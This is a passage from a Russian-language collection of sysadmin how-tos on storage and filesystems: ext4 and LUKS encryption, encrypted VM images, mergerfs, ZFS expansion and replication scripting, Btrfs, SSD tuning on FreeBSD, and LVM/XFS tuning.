указав выданный идентификатор ключа: e4crypt set_policy f467134ca2c48c33 /secret/home/user Если после перезагрузки попытаться обратится к каталогу /secret/home/user без добавления ключа командой "e4crypt add_key", его содержимое будет показано в зашифрованном виде. Для расшифровки каталога при каждой загрузке необходимо настроить повторный вызов команды add_key для привязки ключа. e4crypt add_key -S /home/user/.crypt_salt Enter passphrase (echo disabled): Added key with descriptor [f467134ca2c48c33] Для просмотра привязанного к каталогу ключа можно использовать команду e4crypt get_policy /secret/home/user В случае необходимости шифрования всего содержимого можно использовать LUKS cryptsetup для шифрования имеющегося раздела без потери данных. Отмонтируем шифруемый раздел (при изменении корневого раздела нужно загрузиться с отдельного live-дистрибутива), проверяем целостность ФС и уменьшаем размер ФС для того, чтобы разместить заголвки LUKS на диске (в ФС должно быть достаточно свободного места): e2fsck -f /dev/sda4 resize2fs /dev/sda4 размер_меньше_текущего_на_32МБ Шифруем содержимое имеющегося раздела без потери информации: cryptsetup reencrypt --encrypt /dev/sda4 --reduce-device-size 32M Открываем раздел: cryptsetup open /dev/sdXY home Увеличиваем размер ФС до свободной границы resize2fs /dev/mapper/home Монтируем раздел: mount /dev/mapper/home /mnt/home Смотрим UUID: blkid /dev/mapper/home Добавляем информацию о разделе в /etc/crypttab home UUID=UUID_устройства_LUKS none

Создание шифрованных образов виртуальных машин (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Инструкция по созданию полностью зашифрованного образа гостевой системы, в котором шифрование охватывает корневой раздел и стадию загрузки. Извлекаем содержимое корневого раздела образа виртуальной машины, который требуется зашифровать, в tar-архив vm_root.tar. Проверяем, чтобы в образе были необходимые для шифрования и EFI-загрузки разделов утилиты, такие как cryptodisk и grub-efi. Создаём файл с дисковым образом, содержащим два раздела - небольшой раздел для EFI (p1, 100МБ) и корневой раздел, содержимое которого будет зашифровано (p2). truncate -s 4GB disk.img parted disk.img mklabel gpt parted disk.img mkpart primary 1Mib 100Mib parted disk.img mkpart primary 100Mib 100% parted disk.img set 1 esp on parted disk.img set 1 boot on Настраиваем EFI на первом разделе и дисковое шифрование LUKS на втором. Для повышения защищённости можно заполнить шифрованный раздел случайными числами, но это приведёт к увеличению размера итогового образа qcow2. Создаём на шифрованном разделе ФС Ext4. привязываем образ к loop-устройству losetup -P -f disk.img определяем имя созданного устройства (/dev/loopN), в дальнейшем используем переменную $l вместо устройства l=($(losetup -l|grep disk.img)) создаём раздел с EFI, используем VFAT mkfs.vfat ${l}p1 определяем UUID раздела EFI blkid ${l}p1 создаём шифрованный раздел, в процессе задаём временный пароль для расшифровки cryptsetup --type luks1 luksFormat ${l}p2 определяем UUID шифрованного раздела blkid ${l}p2 активируем шифрованный раздел и создаём на нём ФС ext4 cryptsetup luksOpen ${l}p2 cr_root mkfs.ext4 /dev/mapper/cr_root монтируем раздел, копируем в него содержимое tar-архива с начинкой корневого раздела и создаём каталоги для точек монтирования /run, /sys, /proc и /dev. mount /dev/mapper/cr_root /mnt tar -C /mnt -xpf vm_root.tar for m in run sys proc dev; do mount --bind /$m /mnt/$m; done входим в окружение созданного корневого раздела chroot /mnt В /etc/fstab определяем метку корневого раздела (/dev/disk/cr_root) и раздела EFI (/boot/efi). Настраиваем и устанавливаем загрузчик GRUB (в некоторых дистрибутивах вместо /boot/grub используется /boot/grub2, а вместо префикса "grub" - "grub2-"): echo "GRUB_ENABLE_CRYPTODISK=y" >> /etc/default/grub mount /boot/efi grub-install --removable --target=x86_64-efi grub-mkconfig -o /boot/grub/grub.cfg Для систем с mkinitramfs (Debian) дополнительно нужно добавить параметры шифрованного раздела в /etc/crypttab: cr_root UUID=<uuid> luks none После чего пересоздаём образ ram-диска с компонентами для начальной загрузки. Для систем с dracut требуется изменить настройки /etc/default/grub, указав в GRUB_CMDLINE_LINUX привязку rd.luks.uuid=<UUID>. Для дистрибутивов с SELinux также нужно обновить метки (relabel). Отмонтируем созданные в процессе подготовки образа разделы из /mnt и пытаемся загрузить образ, используя режим EFI. В процессе загрузки вводим заданный ранее временный пароль и проверяем работоспособность окружения. Заменяем временный пароль на ключ для быстрой загрузки и настраиваем ram-диск для его использования. Для образа, примонтированного через /dev/sda: dd if=/dev/urandom bs=1 count=33|base64 -w 0 > /etc/cryptsetup-keys.d/luks-<UUID>.key chmod 600 /etc/cryptsetup-keys.d/luks-<UUID>.key cryptsetup --key-slot 1 luksAddKey /dev/sda2 # первичный ключ для восстановления cryptsetup --key-slot 0 luksRemoveKey /dev/sda2 # удаляем временный ключ cryptsetup --key-slot 0 --iter-time 1 luksAddKey /dev/sda2 /etc/cryptsetup-keys.d/luks-<UUID>.key Указание опции "-w 0" в dd необходимо для того, чтобы исключить появление в пароле символа перевода строки. Для систем с mkinitramfs теперь нужно изменить настройки /etc/crypttab, указав путь к сгенерированному ключу: cr_root UUID=<UUID> /etc/cryptsetup-keys.d/luks-<UUID>.key luks Для систем с dracut необходимо добавить hook ключа в /etc/dracut.conf.d, а для Debian также потребуется указать маску определения файла с ключом: cryptodisk.conf install_items+=" /etc/cryptsetup-keys.d/* " echo "KEYFILE_PATTERN=\"/etc/cryptsetup-keys.d/*\"" >>/etc/cryptsetup-initramfs/conf-hook Теперь можно перегенерировать образ RAM-диска начальной загрузки. После попытки загрузки пароль будет спрошен один раз только на стадии запуска GRUB и на последующих стадиях загрузки запрашиваться не будет.

Логическое объединение нескольких файловых систем при помощи mergerfs (доп. ссылка 1) [комментарии]

FUSE-модуль Mergerfs позволяет логически объединить несколько файловых систем в одну, например, для объединения разнесённых на разные диски коллекции видео или музыки в одну иерархию. В отличие от aufs и overlayfs в mergerfs не создаётся отдельного слоя для записи и данная ФС не может применяться поверх разделов, доступных в режиме только для чтения. Но mergerfs даёт возможность прямой записи в примонтированный раздел в соответствии с заданной политикой, например, запись может осуществляться в ФС, в которой больше свободного места. Также можно включить в один сводный раздел ФС, доступную на запись, и ФС только для чтения. В такой конфигурации операции записи будут производиться в разделе, который допускает запись. Среди особенностей mergerfs: настройка поведения размещения новых файлов, работа в пространстве пользователей через FUSE, поддержка расширенных атрибутов (xattrs) и смены атрибутов chattr, работа с различными ФС, поддержка POSIX ACL. Проектом собираются пакеты для Fedora, Debian и Ubuntu. Устанавливаем mergerfs в Fedora 31: wget https://github.com/trapexit/mergerfs/releases/download/2.29.0/mergerfs-2.29.0-1.fc31.x86_64.rpm sudo dnf install mergerfs-2.29.0-1.fc31.x86_64.rpm Допустим, в системе есть два раздела /disk1 и /disk2, на которых имеются каталоги с видео: $ df -hT | grep disk /dev/sdb1 ext4 23M 386K 21M 2% /disk1 /dev/sdc1 ext4 44M 1.1M 40M 3% /disk2 $ ls -l /disk1/Videos/ total 1 -rw-r--r--. 1 curt curt 0 Mar 8 17:17 file1.mkv $ ls -l /disk2/Videos/ total 2 -rw-r--r--. 1 curt curt 0 Mar 8 17:17 file2.mkv -rw-rw-r--. 1 curt curt 0 Mar 8 17:21 file3.mkv Создадим логический раздел /media, который будет включать в себя как /disk1, так и /disk2: $ sudo mergerfs -o defaults,allow_other,use_ino,category.create=mfs,moveonenospc=true,minfreespace=1M /disk1:/disk2 /media где defaults - применение настроек по умолчанию allow_other - возможность доступа непривилегированных пользователей, а не только root use_ino - манипуляция исходными inode вместо libfuse для того, чтобы связанные файлы имели одинаковые inode. category.create=mfs - распределение новых файлов в зависимости от доступного свободного пространства. moveonenospc=true - в случае сбоя записи искать раздел с большим свободным местом. minfreespace=1M - минимальное свободное место для записи. disk1 - первый подключаемый раздел disk2 - второй подключаемый раздел /media - точка монтирования После монтирования получим: $ df -hT | grep media 1:2 fuse.mergerfs 66M 1.4M 60M 3% /media Если скопировать в /media/Videos/ большой новый файл, для которого не хватает места в /disk1, но который вмещается в /disk2, то это файл будет размещён в разделе /disk2. Разделы /disk1 и /disk2 после монтирования остаются доступны для любых операций, /media объединяет их лишь логически. $ ls -lh file4.mkv -rw-rw-r--. 1 curt curt 30M Apr 20 08:45 file4.mkv $ cp file4.mkv /media/Videos/ $ ls -l /disk1/Videos/ total 1 -rw-r--r--. 1 curt curt 0 Mar 8 17:17 file1.mkv $ ls -l /disk2/Videos/ total 30003 -rw-r--r--. 1 curt curt 0 Mar 8 17:17 file2.mkv -rw-rw-r--. 1 curt curt 0 Mar 8 17:21 file3.mkv -rw-rw-r--. 1 curt curt 30720000 Apr 20 08:47 file4.mkv $ ls -l /media/Videos/ total 30004 -rw-r--r--. 1 curt curt 0 Mar 8 17:17 file1.mkv -rw-rw-r--. 1 curt curt 0 Mar 8 17:21 file2.mkv -rw-r--r--. 1 curt curt 0 Mar 8 17:17 file3.mkv -rw-rw-r--. 1 curt curt 30720000 Apr 20 08:47 file4.mkv

Обход проблем при расширении хранилища ZFS в Linux Автор: пох [комментарии]

Внезапное открытие - прекрасная ZFS в прекрасной Ubuntu LTS имеет некоторые проблемы с банальным увеличением vdev. Если у вас жила-была (такая) система с zfs'ом, тихонько подползала к пресловутым 80% заполнения, и вы решили добавить ей места, памятуя о легкости необычайной и безопасности выполнения в ней таких вещей, вас ждет малоприятный сюрприз. Добавляем ценный ресурс к LUN, хранилище рапортует ок, радостно видим что ядро линукса подхватило новую информацию (у меня это произошло даже без необходимости дергать вручную /sys/гдетамоно/sdчтото/гдетотамеще/rescan) и... и.... и ничего. Если это случилось: zpool set autoexpand=on <pool> zpool online -e <pool> <sd?> Эта команда не принесёт успеха, но поменяет gpt метку - что вы должны увидеть, запустив fdisk до и после - если этого не происходит, ядро у вас не увидело увеличения устройства, запустите rescan ещё раз. Теперь у нас хотя бы физический диск действительно занимает весь нововыделенный объем. reboot # без него ничего не получится Нет, все ещё счастья не воспоследовало, но! zpool list Показывает нечто, отличное от прочерка в графе EXPANDSZ! Победа. Btw, наличие этой графы в выводе zpool как раз признак версии, где проблема еще/уже не исправлена zpool online -e <pool> <sd?> # еще раз! Теперь list должен показать, что счастье настало, а zfs list - соответственно, что приросли и сами fs на этом пуле Не правда ли, сущая ерунда по сравнению со сложнейшей командой resize2fs ?! Долгое гугление приводит к обнаружению треда 2016(!) года о том как разработчики в очередной раз сами себе наступили на ногу, открыв устройство с O_EXCL и не сумев параллельно в нем покопаться из другого процесса, но не извольте беспокоиться, все уже переписали и закоммитил лично Бехлендорф (гуглите, в короткой статье нет места описанию этих ужасов - а то что там поназакоммичено ужас кромешный и есть) - но то ли не в ту версию что у ubuntu 18.04, то ли недостаточно хорошо закоммичено. Еще более тщательное гугление приводит к паре статей на stack, где автор "двадцать раз поперезагружался, подергал какие-то команды, хистори лог в терминале сохранил"...но постеснялся его выложить. К счастью, я не настолько стеснителен, и к тому же проверял результат. Надеюсь, кому-то следующему повезет не потерять на это лишних полчаса.

Оптимизация использования SSD-накопителя во FreeBSD 9.0 Автор: ixes [комментарии]

Ниже собраны рекомендации по оптимизации работы SSD-накопителя во FreeBSD 9.0, которые удалось найти в Сети. Процесс установки и оптимизации под 4k блоки со сдвигом кратный 8, описывать не буду так как FreeBSD 9.0 cам все это делает (если установка выполнялась в автоматическом режиме). После установки необходимо включить поддержку TRIM, для этого следует выполнить (диск должен быть отмонтирован - загрузись с LiveCD): tunefs -t enable /dev/adaxxx Отключение журналирования (может быть чревато более длительным временем проверки целостности ФС, если некорректно завершить работу, нажать reset, или если свет отключат - пользуйтесь бесперебойником): tunefs -J disable /dev/adaxxx tunefs -n disable /dev/adaxxx tunefs -j disable /dev/adaxxx Посмотреть состояние флагов раздела можно командой: tunefs -p /dev/adaxxx Отключение лишних обновлений метаданных (noatime) и использование tmpfs для временных разделов и логов в /etc/fstab: /dev/adaxxx / ufs rw,noatime 1 1 tmpfs /tmp tmpfs rw 0 0 tmpfs /var/run tmpfs rw 0 0 tmpfs /var/spool tmpfs rw 0 0 tmpfs /var/log tmpfs rw 0 0 Перед добавлением убедитесь, что /var/spool, /var/log и /var/run не содержит того, что может потребоваться между перезагрузками. Вариант настройки через /etc/rc.conf: tmpmfs="YES" tmpsize="20m" tmpmfs_flags="-S" varmfs="YES" varsize="32m" varmfs_flags="-S" populate_var="YES" Размер виртуальной файловой системы (tmpfs) писать в соответствии с свободным ОЗУ (в нашем примере, 20 мегабайт для /tmp и 32 мегабайт для /var). Настройки нужно сделать или в /etc/fstab или в /etc/rc.conf.

Использование расширенных возможностей Btrfs (доп. ссылка 1) [комментарии]

В заметке представлены примеры использования таких расширенных функций Btrfs как создания отказоустойчивых конфигураций, опции для обеспечения целостности данных, хранение данных в сжатом виде, снапшоты. Создадим тестовый раздел Btrfs на диске /dev/sdb: # mkfs.btrfs /dev/sdb adding device /dev/sdb id 2 fs created label (null) on /dev/sdb nodesize 4096 leafsize 4096 sectorsize 4096 size 10.00GB Btrfs Btrfs v0.19 Примонтируем созданный раздел: # mount /dev/sdb /mnt Создадим подраздел и скопируем на него тестовые файлы: # cd /mnt # btrfs subvolume create MYFILES # cp myfile* /mnt/MYFILES # ls /mnt/MYFILES myfile1 myfile2 myfile3 Удалим один из файлов: # rm /mnt/MYFILES/myfile2 # ls /mnt/MYFILES myfile1 myfile3 Если файлов очень много, то удалять их командой "rm -rf" достаточно долгий и ресурсоёмкий процесс. В этом случае проще воспользоваться командой удаления подраздела: # btrfs subvolume delete MYFILES При этом важно понимать, что удалить можно только отдельно созданные подразделы. Подраздел, создаваемый по умолчанию при форматировании ФС, удалению не подлежит. Настройка отказоустойчивой конфигурации с зеркалированием на несколько дисков. Btrfs предоставляет достаточно гибкие средства по зерклированию данных и расширению доступного пространства раздела. Дополнительные диски можно подключить в любое время, расширив таким образом размер ФС или обеспечив отказоустойчивость. По умолчанию при размещении радела на нескольких дисках осуществляется зеркалирование метаданных на двух дисках, но сами данные распределяются по данным дискам без резервирования (размер ФС получается равным суммарному размеру дисков). Если диск один, то две копии метаданных размещаются на нём. Добавим в уже созданный раздел дополнительный диск /dev/sdc, все данные уже сохранённые на первом диске останутся на месте, если не выполнить операцию ребалансировки: # btrfs device add /dev/sdc /mnt/btrfs # btrfs filesystem show Label: none uuid: b4f5c9a8-d8ec-4a5b-84f0-2b8c8d18b257 Total devices 2 FS bytes used 200.33MB devid 1 size 5.00GB used 5.00GB path /dev/sdb devid 2 size 5.00GB used 4.98GB path /dev/sdc Использование RAID Btrfs имеет встроенную поддержку нескольких уровней RAID (RAID1, RAID5). В отличии от обычных программных и аппаратных RAID, Btrfs оперирует не формированием RAID на уровне дисков, а использует для создания логических RAID разделов распределение chunk-ов, определяющих дисковую область заданного размера (от 256 Мб). Каждый chunk может быть отзеркалирован на несколько дисков или склеен из частей разных дисков. При создании RAID для данных и метаданных могут применяться разные методы хранения, например, для метаданных и служебных структур всегда применяется зеркалирование. Создать RAID заданного уровня для данных и метаданных можно на этапе создания ФС. Например, создадим RAID1 (зеркало) из двух дисков: # mkfs.btrfs -m raid1 -d raid1 /dev/sdb /dev/sdc mkfs.btrfs -m raid1 -d raid1 /dev/sdb /dev/sdc adding device /dev/sdc id 2 fs created label (null) on /dev/sdb nodesize 4096 leafsize 4096 sectorsize 4096 size 10.00GB Btrfs Btrfs v0.19 После чего подключим ещё два диска и создадим RAID10 (зеркало на двух склеенных дисках): # mkfs.btrfs -m raid10 -d raid10 /dev/sdd /dev/sde adding device /dev/sde id 2 fs created label (null) on /dev/sdd nodesize 4096 leafsize 4096 sectorsize 4096 size 10.00GB Btrfs Btrfs v0.19 Опция "-m" задаёт уровень RAID для метаданных, а "-d" для данных. Например, можно использовать смешанные схемы: # mkfs.btrfs -m raid1 -d raid10 /dev/sdf /dev/sdg /dev/sdh /dev/sdi Обеспечение целостности данных. Btrfs поддерживает несколько встроенных механизмов обеспечения целостности: * Хранение контрольных сумм для проверки блоков данных и метаданных; * Изоляция сбоев (отдельное сохранение данных и метаданных с CRC-верификацией); * Средства выявления повреждений и их автоматической корректировки (проверка по контрольным суммам осуществляется при каждом чтении блока, если выявлено расхождение осуществляется попытка прочитать повреждённый блок с другого диска, после чего осуществляется корректировка повреждённого блока); * Поддержка операции фоновой перепроверки всего содержимого ФС (вычисляются и сверяются контрольные суммы для всех блоков). Для запуска проверки следует выполнить: # btrfs scrub start /mnt/MYFILES * Перестроение RAID при замене или добавлении новых дисков. Отличительной чертой Btrfs является то, что в перестроении участвуют только занятые блоки, что существенно сокращает время выполнения операции. * В настоящее время в Btrfs нет встроенной возможности хранения информации в зашифрованном виде, но обеспечить шифрование можно путем создания ФС поверх шифрованных разделов, созданным при помощи подсистем dm_crypt и LUKS. Использование сжатия данных. Для оптимизации расходования дискового пространства при хранении хорошо сжимаемых данных можно использовать встроенные в Btrfs механизмы сжатия. Поддерживается сжатие методами Lempel-Ziv-Oberhumer (LZO) или zlib (в разработке поддержка Snappy и LZ4). Включить сжатие можно после создания ФС, на этапе монтирования, при этом сжиматься будут только новые данные. Монтируем раздел с включением сжатия: # mount -o compress=lzo /dev/sdb /mnt/MYFILES Сжатие можно включить и для отдельного подраздела: # btrfs subvolume create /mnt/MYFILES/mysubvol # mount -o compress=lzo,subvol=mysubvol /dev/sdb /mnt/MYSUBVOL Снапшоты и клонирование. В рамках снапшота может быть сделан активный срез состояния ФС в заданный момент времени. В дальнейшем, используя средства миграции данный, сохранённый снапшот можно восстановить на другой машине. Кроме задействования дополнительных метаданных снапшон не приводит к дополнительному расходованию дискового пространства - физически хранится одна копия данных. Создадим снапшот для ранее созданных данных: # ls /mnt/MYFILES myfile1 myfile2 # btrfs subvolume snapshot /mnt/MYFILES /mnt/SNAPSHOT # ls /mnt/SNAPSHOT myfile1 myfile2 Для отдельных фалов можно создавать клоны, которые в отличие от копирования используют один набор блоков на диске: # cp --reflink /mnt/MYFILES/myfile1 /mnt/MYFILES/myfile3 # ls /mnt/MYFILES myfile1 myfile2 myfile3 Средства дефрагментации. Btrfs поддерживает режим автоматической фоновой дефрагментации, активируемый при помощи опции монтирования "-o autodefrag". Кроме того, дефрагментацию можно запустить вручную: # btrfs filesystem defrag /mnt

Создание и обслуживание разделов с файловой системой Btrfs (доп. ссылка 1) [комментарии]

Для примера создадим Btrfs-раздел размером 10 Гб, включающий в себя два диска по 5 Гб (/dev/sdb и /dev/sdc): # mkfs.btrfs /dev/sdb /dev/sdc adding device /dev/sdc id 2 fs created label (null) on /dev/sdb nodesize 4096 leafsize 4096 sectorsize 4096 size 10.00GB Для проверки, что файловая система охватывает два диска выполним: # btrfs filesystem show /dev/sdb Label: none uuid: b4f5c9a8-d8ec-4a5b-84f0-2b8c8d18b257 Total devices 2 FS bytes used 28.00KB devid 1 size 5.00GB used 1.53GB path /dev/sdb devid 2 size 5.00GB used 1.51GB path /dev/sdc Смонтируем созданную ФС: # mount /dev/sdb /mnt монтировать следует первое устройство /dev/sdb, при попытке дополнительно смонтировать /dev/sdc будет выдано предупреждение: # mount /dev/sdc /mnt mount: /dev/sdc already mounted or /mnt busy mount: according to mtab, /dev/sdb is already mounted on /mnt Просмотрим информацию о смонтированном разделе: # df -h /mnt Filesystem Size Used Avail Use% Mounted on /dev/sdb 10G 56K 8.0G 1% /mnt # btrfs filesystem df /mnt Data, RAID0: total=1.00GB, used=0.00 Data: total=8.00MB, used=0.00 System, RAID1: total=8.00MB, used=4.00KB System: total=4.00MB, used=0.00 Metadata, RAID1: total=1.00GB, used=24.00KB Metadata: total=8.00MB, used=0.00 Создадим подраздел с именем subbasefoo для хранения файлов и директорий: # btrfs subvolume create subbasefoo Create subvolume './subbasefoo' Поместим в данный подраздел три пустых файла foobar1, foobar2 и foobar3: # touch foobar1 foobar2 foobar3 Создадим снапшот с именем subbasefoo-20120501 созданного ранее подраздела и проверим, что файлы в нём находятся в неизменном виде: # btrfs subvolume snapshot subbasefoo/ subbasefoo-20120501 Create a snapshot of 'subbasefoo/' in './subbasefoo-20120501' # ls -R subbasefoo subbasefoo-20120501 ./subbasefoo: foobar1 foobar2 foobar3 ./subbasefoo-20120501: foobar1 foobar2 foobar3 Удалим файлы в основном подразделе и убедимся, что они сохранились в снапшоте (занимаемое файлами дисковое пространство освободится только после удаления снапшота). По сути снапшот является тем же подразделом, поэтому к нему применимы все команды для подразделов, в том числе создание новых снапшотов. Для использования возможности восстановления состояния подраздела рекомендуется создавать новые снапшоты при проведении в них экспериментов - если результат оказался удачен, старый снапшот можно удалить, а если нет - удалить экспериментальный снапшот. Интересной особенностью является возможность клонирования файлов без расходования дополнительного дискового пространства на каждую копию (хранится только один экземпляр данных). Для подобного клонирования в процессе копирования утилитой cp следует использовать опцию reflink. Например клонируем файл rantest.tst, размером 200 Мб: # df -h . Filesystem Size Used Avail Use% Mounted on - 10G 201M 7.8G 3% /mnt/btrfs/subbasefoo # cp --reflink rantest.tst clonetest.tst # df -h . Filesystem Size Used Avail Use% Mounted on - 10G 201M 7.8G 3% /mnt/btrfs/subbasefoo

Использование ZFS в Ubuntu Linux (доп. ссылка 1) [комментарии]

Установим поддержку ZFS на Ubuntu Server и создадим RAIDZ-хранилище на базе двух имеющихся жестких дисков. Создадим на дисках по разделу при помощи утилиты cfdisk, для просмотра таблицы разделов можно использовать команду "cat /proc/partitions". Установим пакеты, необходимые для обеспечения работы ZFS: sudo apt-get update && sudo apt-get upgrade sudo apt-get install python-software-properties bison flex build-essential \\ libelf-dev zlib1g-dev libc6-dev-i386 libdwarf-dev binutils-dev Подключим дополнительный PPA-репозиторий zfs-native: sudo add-apt-repository ppa:zfs-native/stable и установим из него пакеты с компонентами для поддержки ZFS: sudo apt-get update sudo apt-get install ubuntu-zfs Создадим zpool с именем zfs-test и типом заркалирования RAIDZ, поместив в создаваемый RAID разделы на двух имеющихся дисках: sudo zpool create zfs-test raidz /dev/sdb1 /dev/sdc1 Посмотрим статус созданного раздела: sudo zpool status sudo zfs list df -h

Непрерывная репликация ZFS во FreeBSD Автор: Алексей Волков [комментарии]

Введение С самого начала появления ZFS, я записался в ряды ее поклонников, и до сих пор ни разу не пожалел об этом. И на страницах opennet.ru я уже успел поделиться приятными моментами ее использования на OS FreeBSD. Сегодня речь пойдет о возможностях непрерывной репликации ZFS между хостами FreeBSD. Цели Лично мне это стало не просто полезным, а необходимым, как только возникла задача использования виртуальных окружений, и в рамках одного физического сервера создавалась группа виртуальных серверов. Первоначальная задумка выглядела следующим образом: * Основной сервер виртуализации * Сервер горячей замены (по своим характеристикам близкий, но не идентичный основному) * Коммерческое ПО для виртуализации, не предполагалось, только OpenSource. Задача абсолютной бесперебойной работы не ставилась, основной критерий - быстрое (в пределах 5 минут) время восстановления IT сервисов в случае отказа основного сервера, с минимальной потерей пользовательских данных. Другими словами, если основной сервер выходит из строя, то все данные пользователей, сохраненные за несколько минут до отказа, не должны быть утеряны. Вариант с общим NAS, разделяемый между серверами виртуализации, по ряду причин, в том числе и финансовых, так же не рассматривался. Таким образом, данную конфигурацию можно кратко охарактеризовать, как среда виртуализации начального уровня с элементами отказоустойчивости. Средства В качестве хост системы выступает FreeBSD 8.1 с гипервизором VirtualBox OSS. Я не буду подробно останавливаться на процессе установки и настройки VirtualBox, скажу только то, что оба сервера и основной и резервный имеют идентичное ПО, а все конфигурации и образы виртуальных серверов расположены внутри ZFS с точкой монтирования /var/IMAGES. В таком виде, задача обеспечения отказоустойчивости сводится к синхронизации содержимого /var/IMAGES с основного сервера на резервный, чтобы в случае отказа, оставалась возможность запуска всех серверов на резервном сервере из актуальных образов. Очевидным является тот факт, что чем чаще происходит синхронизация, тем лучше. Так же очевидно что rsync, не смотря на все его прелести, не способен обеспечить синхронизацию заданными выше временными рамками. Беглый поиск выявляет упоминания о коммерческих реализациях zfs репликации а так же стандартных возможностях ZFS создания, и что самое важное, обмена ими между хостами посредством zfs send/receive. Об этом упоминалось, в том числе и на страницах opennet. Именно zfs send/receive будет использован для непрерывной репликации в режиме близкому к реальному времени. Репликацией должен заниматься скрипт, запускаемый из cron, интервал запуска 1 минута. Скрипт запускается на резервном сервере и должен: * Создать новый снапшот на основном сервере. * Все снапшоты, задействованные в процессе репликации, должны иметь некую отличительную особенность (префикс в своем имени). * Выявить самый свежий общий снапшот, относительно которого, можно провести инкрементальную репликацию. В случае его отсутствия провести полную репликации. * Провести репликацию через send/receive * Удалить неиспользуемые снапшоты. * Запротоколировать все свои действия. Как видно из краткого плана мероприятий, резервному серверу придется запускать команды на основном. SSH замечательно справиться с этим, но нужно иметь ввиду что: * запускать через скрипт команды на удаленном сервере от имени рута ( а значит хранить или пароль или ключ рута) не слишком хорошая идея. * ZFS на FreeBSD до сих пор не дружит с ZFS Delegated Administration Учитывая эти два факта, следует завести на основном сервере на привилегированного пользователя и выполнять команды zfs через sudo , разрешив ему необходимый минимум. В файле /usr/local/etc/sudoers.d/zfs_replication определяем для пользователя следующие разрешения synczfs ALL = NOPASSWD : /sbin/zfs snapshot *, /sbin/zfs send *,/sbin/zfs list *,/sbin/zfs destroy * А теперь непосредственно скрипт /root/zfs-nrt-replication.sh #!/bin/sh REMOTE_HOST="master.local" FS="/var/IMAGES" REMOTE_POOL="tank0" LOCAL_POOL="tank0" SNAPSHOTMARK="SYNC-" SSHKEY="/root/syncimages_id" SSHFLAGS="-i $SSHKEY -o CheckHostIP=no -o StrictHostKeyChecking=no \ -o IdentitiesOnly=yes -o BatchMode=yes -o GlobalKnownHostsFile=/dev/null -l synczfs" SSHCMD="/usr/bin/ssh $SSHFLAGS $REMOTE_HOST sudo " INCREMENTAL="" ( echo "Snapshoting remote FS" $SSHCMD "zfs snapshot -r $REMOTE_POOL$FS@$SNAPSHOTMARK`uuidgen`" RECENT_COMMON_SNAPSHOT="" for R in `$SSHCMD zfs list -H -o name -s creation -t snapshot -r $REMOTE_POOL$FS | grep $REMOTE_POOL$FS@` do for L in `zfs list -H -o name -s creation -t snapshot -r $LOCAL_POOL$FS | grep $LOCAL_POOL$FS@` do if [ "${R##*@}" = "${L##*@}" ]; then RECENT_COMMON_SNAPSHOT=${R##*@} INCREMENTAL="-I $REMOTE_POOL$FS@$RECENT_COMMON_SNAPSHOT" fi done REMOTE_LATEST_SNAPSHOT=${R##*@} done echo "Syncronizing remote FS to local" echo "zfs send -R $INCREMENTAL $REMOTE_POOL$FS@$REMOTE_LATEST_SNAPSHOT" $SSHCMD "zfs send -R $INCREMENTAL $REMOTE_POOL$FS@$REMOTE_LATEST_SNAPSHOT" | \ /usr/local/bin/pipemeter --autooff --blocksize 16M --interval 60 --log | zfs receive -dF $LOCAL_POOL if [ $? -eq 0 ]; then echo "Cleaning useless remote snapshots" $SSHCMD "zfs list -r -t snapshot -o name -H $REMOTE_POOL$FS | grep \"$SNAPSHOTMARK\" | \ egrep -v \"@($RECENT_COMMON_SNAPSHOT|$REMOTE_LATEST_SNAPSHOT)\" | xargs -I% sudo zfs destroy %" fi echo "Done." ) 2>&1 | logger -s -p ftp.info -t SYNCZFS Сам скрипт запускается на резервном сервере из cron следующим образом */1 * * * * root /usr/sbin/daemon -p /var/run/zfs-sync.pid -f /root/zfs-nrt-replication.sh > /dev/null Итак, на резервном сервере скрипт запускается каждую минуту, но если он еще не закончил свое выполнение с прошлого запуска, то попытка пропускается. Весь вывод скрипта направляется в лог-файл /var/log/xferlog. Для более наглядной оценки скорости используется дополнительное ПО pipemeter, в результате чего в лог файл, с минутным интервалом, добавляется информация об объеме передаваемых данных, а так же скорости обмена. Дополнительно, можно настроить автоматический снапшотинг, чтобы иметь версии виртуальных машин различной степени давности (часовой, дневной, недельной и т.д.). Эти версии так же будут реплицироваться на резервный сервер. И теперь, в случае обнаружения отказа в работе основного сервера, администратору остается запустить виртуальную машину на резервном сервере, но и этот процесс так же можно автоматизировать, но это материал еще для одной статьи :)

Тюнинг LVM, RAID, XFS и EXT3 при интенсивной обработке мелких файлов (доп. ссылка 1) [комментарии]

Рекомендации по тюнингу некоторых системных параметров в Debian/GNU Linux для оптимизации работы высоконагруженных систем, производящих тысячи одновременных запросов к массиву из десятка миллионов мелких файлов (например, типичная ситуация для нагруженного почтового сервера с maildir). В итоге удалось снизить время ожидания процессором завершения ввода/вывода (I/O wait) для XFS с 30% до 0.3%, а для EXT3 до 5%. Для увеличения производительности при большом числе параллельных дисковых операций рекомендуется использовать хранилища, подключенные через Fiber Channel, и использовать технологию Multipath для организации доступа к хранилищу, подключенному через несколько каналов (путей) ввода/вывода. Повысить производительность можно подключив несколько дисков в LVM и RAID, используя "striping"-режим без контроля целостности. Оптимальная производительность для программного RAID при обработке небольших файлов достигается при размере stripe-блока 4 Мб и размере chunk-а 256 Кб. Важное значение имеет также выравнивание файловых систем, LVM и RAID относительно внутренней группировки дисков в хранилище (учитываем физические параметры массива для логически предоставляемого хранилищем раздела). Например, имея хранилище IBM DS 8300 из 8 дисков, подключенных по Fiber Channel и объединенных в RAID5, будет использовать разбиение на 8 каналов ввода/вывода: # pvcreate /dev/mapper/mpath0 # pvcreate /dev/mapper/mpath1 ... # pvcreate /dev/mapper/mpath7 # vgcreate --autobackup y grupo1 /dev/mapper/mpath0 /dev/mapper/mpath1 \ /dev/mapper/mpath2 /dev/mapper/mpath3 /dev/mapper/mpath4 /dev/mapper/mpath5 \ /dev/mapper/mpath6 /dev/mapper/mpath7 # lvcreate --autobackup y --readahead auto --stripes 8 --stripesize 4096 \ --size 1,95T --name lvstripe2 grupo1 Оптимизация файловых систем: Ext3 плохо подходит для конфигурация с большим объемом параллельных запросов, но показывает лучшую производительность при однопоточной обработке мелких файлов, на производительность Ext3 также отрицательно влияет накапливающаяся со временем фрагментация данных. Оптимальным решением при высокой параллельной нагрузке и при работе с очень большими файлами является XFS, в случае использования нескольких Allocation Group. При использовании XFS, операции по выравниванию относительно stripe-раздела LVM или RAID производятся автоматически. Для Ext3 обязательно нужно рассчитывать смещение вручную, иначе будет наблюдаться падение производительности (http://busybox.net/~aldot/mkfs_stride.html http://wiki.centos.org/HowTos/Disk_Optimization) Форматирование ФС. Существенная разница в плане оптимизации состоит в том, что в 